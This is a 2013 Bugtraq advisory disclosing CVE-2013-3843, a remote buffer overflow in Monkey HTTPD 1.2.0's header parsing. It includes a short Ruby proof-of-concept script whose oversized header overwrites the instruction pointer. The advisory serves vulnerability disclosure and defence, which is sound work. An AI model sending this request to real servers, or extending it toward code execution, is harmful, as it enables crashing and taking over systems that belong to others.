[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201306041619.r54GJnU3024014@sf01web3.securityfocus.com>
Date: Tue, 4 Jun 2013 16:19:49 GMT
From: dougtko@...il.com
To: bugtraq@...urityfocus.com
Subject: CVE-2013-3843 Monkey HTTPD 1.2.0 - Buffer Overflow DoS
Vulnerability With Possible Arbitrary Code Execution
1. Title
CVE-2013-3843 Monkey HTTPD 1.2.0 - Buffer Overflow DoS
Vulnerability With Possible Arbitrary Code Execution
2. Introduction
Monkey is a lightweight and powerful web server for
GNU/Linux.
It has been designed to be very scalable with low memory
and CPU consumption, the perfect solution for embedded
devices. Made for ARM, x86 and x64.
3. Abstract
A specially crafted request sent to the Monkey HTTPD
server triggers a buffer overflow which can be used to
control the flow of execution.
4. Report Timeline
2013-05-29
Discovered vulnerability via fuzzing
2013-05-30
Vendor Notification
5. Status
Published
6. Affected Products
Monkey HTTPD <= 1.2.0
7. Exploitation Technique
Remote
8. Details
Improper bounds checking while parsing headers allows
for an attacker to craft a request that will trigger a
buffer overflow during a call to memcpy() on line 268
in the file, mk_request.c.
9. Proof of Concept
The vulnerability can be exploited by remote attacker
without any special privileges. Under Ubuntu 13.04,
an offset of 2511 lines up the instruction pointer
with, 0x42424242.
#!/usr/bin/env ruby
require "socket"
host = "localhost"
port = 2001
s = TCPSocket.open(host, port)
buf = "GET / HTTP/1.1\r\n"
buf << "Host: " + "\r\n"
buf << "localhost\r\n"
buf << "Bad: "
buf << "A" * 2511
buf << "B" * 4
s.puts(buf)
10. Solution
There is currently no solution.
11. Risk
Risk should be considered high since it can be shown that
the flow of execution can be controlled by an attacker.
12. References
http://bugs.monkey-project.com/ticket/182
13. Credits
Doug Prostko <dougtko[at]gmail[dot]com>
Vulnerability discovery
Powered by blists - more mailing lists